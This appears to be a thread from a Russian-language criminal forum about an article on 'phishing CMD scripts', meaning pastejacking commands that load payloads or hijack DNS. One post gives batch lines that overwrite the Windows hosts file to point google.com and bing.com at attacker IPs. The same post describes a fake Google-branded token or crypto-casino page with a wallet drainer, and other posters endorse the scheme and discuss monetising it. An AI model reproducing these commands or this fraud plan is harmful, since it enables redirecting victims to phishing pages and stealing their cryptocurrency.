Статья Creating phishing malicious CMD scripts

Tr0jan_Horse · 18.03.2025

Всем привет, решил написать статью, может кого-то уже посещали идеи или ранее где-то подобное упоминалось, но написана лично мной, надеюсь будет интересно!
В статье мы рассмотрим интересный способ распространения полезных нагрузок через веб, который не привлёк внимания со стороны безопасности браузера, потому что используется в легитимных целях обычно. Ну и рассмотрим две полезные нагрузки:

Loader. Скачает и запустит файл
DNS Router. При попытке перейти по какому-то домену, пользователя будет перебрасывать на наш phishing.

Hi everyone, I decided to write an article, maybe someone has already visited the ideas or previously somewhere similar mentioned, but written by me personally, I hope it will be interesting!
In the article we'll look at an interesting way to distribute payloads over the web, which has not attracted attention from browser security, because it is used for legitimate purposes usually. So let's take a look at two payloads:

Loader. Downloads and runs the file
DNS Router. When trying to navigate to some domain, the user will be redirected to our phishing.

Русская версия:
https://telegra.ph/Phishing-CMD-scripts-idea-RU-03-18
ENG version:
https://telegra.ph/Phishing-CMD-scripts-idea-03-18

kuke · 10.04.2025

недавно посещали мысли о таком методе, хорошая статья

Tr0jan_Horse · 11.04.2025

kuke сказал(а):

недавно посещали мысли о таком методе, хорошая статья

Спасибо!

erjomy · 12.04.2025

Первый вариант для гениев социнженерии ) Это нужно заставить скопировать в терминал - затем алерт PS -> затем если файл исполняемый еще алерт. Проходимость будет крайне мала
Второй - подмена хоста - гениальная классика если грамотно пройден Initial Access (доставка полезной нагрузки).
Достаточно встроить в атаку зацикленное окно UAC для повышения прав и при переходе на страницу Коин бейз получаем спуф контент с оригинальным асдресом в браузере

xrahitel · 12.04.2025

Это не фишинг назваться а Pastejacking привет из 2017 года

В этом ролике софт есть, для подобного

divx · 13.04.2025

Очень крутая тема
DNS Router. При попытке перейти по какому-то домену, пользователя будет перебрасывать на наш phishing.

Создаем файл с расширением .bat и кидаем туда

Код:

ECHO %NEWLINE%^11.11.11.11 bing.com>>%WINDIR%\System32\drivers\etc\hosts
ECHO %NEWLINE%^22.22.22.22 google.com>>%WINDIR%\System32\drivers\etc\hosts

указав все домены гугла по странам

Фиш страницу делаем в стиле гугла например, якобы google / bing совместно с metamask wallet выпускают токены - успей забрать свои (и кнопка на connect wallet с драйнером)

а лучше сайт якобы реального крипто-казино от гугла - Получи 500 FREE SPINS и выводи выигрыш без KYC
не один лудоман такой возможности не упустит, естественно это крипто казино и нужно законектить кошелек - а там драйнер

Самое интересное что человек будет в ахуе что при заходе на сайт гугла - сам гугл предлагает ему такое, и мыслей что его хотят как-то наебать у 99% не будет никаких, будет думать что все легально

zzzka · 13.04.2025

Tr0jan_Horse сказал(а):

Всем привет, решил написать статью, может кого-то уже посещали идеи или ранее где-то подобное упоминалось, но написана лично мной, надеюсь будет интересно!
В статье мы рассмотрим интересный способ распространения полезных нагрузок через веб, который не привлёк внимания со стороны безопасности браузера, потому что используется в легитимных целях обычно. Ну и рассмотрим две полезные нагрузки:

Loader. Скачает и запустит файл

DNS Router. При попытке перейти по какому-то домену, пользователя будет перебрасывать на наш phishing.

Hi everyone, I decided to write an article, maybe someone has already visited the ideas or previously somewhere similar mentioned, but written by me personally, I hope it will be interesting!
In the article we'll look at an interesting way to distribute payloads over the web, which has not attracted attention from browser security, because it is used for legitimate purposes usually. So let's take a look at two payloads:

Loader. Downloads and runs the file

DNS Router. When trying to navigate to some domain, the user will be redirected to our phishing.

Русская версия:
https://telegra.ph/Phishing-CMD-scripts-idea-RU-03-18
ENG version:
https://telegra.ph/Phishing-CMD-scripts-idea-03-18

пару дней назад пришла такая мысль в голову, посидел с чат жпт через изменение хоста, проблема была в hsts или как-то так

zzzka · 13.04.2025

divx сказал(а):
Очень крутая тема
DNS Router. При попытке перейти по какому-то домену, пользователя будет перебрасывать на наш phishing.

Создаем файл с расширением .bat и кидаем туда
Код:
ECHO %NEWLINE%^11.11.11.11 bing.com>>%WINDIR%\System32\drivers\etc\hosts
ECHO %NEWLINE%^22.22.22.22 google.com>>%WINDIR%\System32\drivers\etc\hosts
указав все домены гугла по странам

Фиш страницу делаем в стиле гугла например, якобы google / bing совместно с metamask wallet выпускают токены - успей забрать свои (и кнопка на connect wallet с драйнером)

а лучше сайт якобы реального крипто-казино от гугла - Получи 500 FREE SPINS и выводи выигрыш без KYC
не один лудоман такой возможности не упустит, естественно это крипто казино и нужно законектить кошелек - а там драйнер

Самое интересное что человек будет в ахуе что при заходе на сайт гугла - сам гугл предлагает ему такое, и мыслей что его хотят как-то наебать у 99% не будет никаких, будет думать что все легально

тема, надо попробывать

Tr0jan_Horse · 18.04.2025

xrahitel сказал(а):

Это не фишинг назваться а Pastejacking привет из 2017 года

В этом ролике софт есть, для подобного

Я рад, что вы нашли метод ранее, просто для меня, когда в голове родились мысли этой штуки, это было открытием и решил поделиться

Tr0jan_Horse · 18.04.2025

divx сказал(а):
Очень крутая тема
DNS Router. При попытке перейти по какому-то домену, пользователя будет перебрасывать на наш phishing.

Создаем файл с расширением .bat и кидаем туда
Код:
ECHO %NEWLINE%^11.11.11.11 bing.com>>%WINDIR%\System32\drivers\etc\hosts
ECHO %NEWLINE%^22.22.22.22 google.com>>%WINDIR%\System32\drivers\etc\hosts
указав все домены гугла по странам

Фиш страницу делаем в стиле гугла например, якобы google / bing совместно с metamask wallet выпускают токены - успей забрать свои (и кнопка на connect wallet с драйнером)

а лучше сайт якобы реального крипто-казино от гугла - Получи 500 FREE SPINS и выводи выигрыш без KYC
не один лудоман такой возможности не упустит, естественно это крипто казино и нужно законектить кошелек - а там драйнер

Самое интересное что человек будет в ахуе что при заходе на сайт гугла - сам гугл предлагает ему такое, и мыслей что его хотят как-то наебать у 99% не будет никаких, будет думать что все легально

Вы абсолютно правы! Любая креативная идея поможет реализовать монетизацию, потому что ноль подозрений. Единственное, что гугл савить будет сложнее, ибо когда пользователь будет пытаться сделать запрос в гугл, в фишинге придётся заморочиться, чтоб было прокси.

Статья Creating phishing malicious CMD scripts

Tr0jan_Horse

RAID-массив

kuke

floppy-диск

Tr0jan_Horse

RAID-массив

erjomy

floppy-диск

xrahitel

(L1) cache

divx

ripper

zzzka

RAID-массив

zzzka

RAID-массив

Tr0jan_Horse

RAID-массив

Tr0jan_Horse

RAID-массив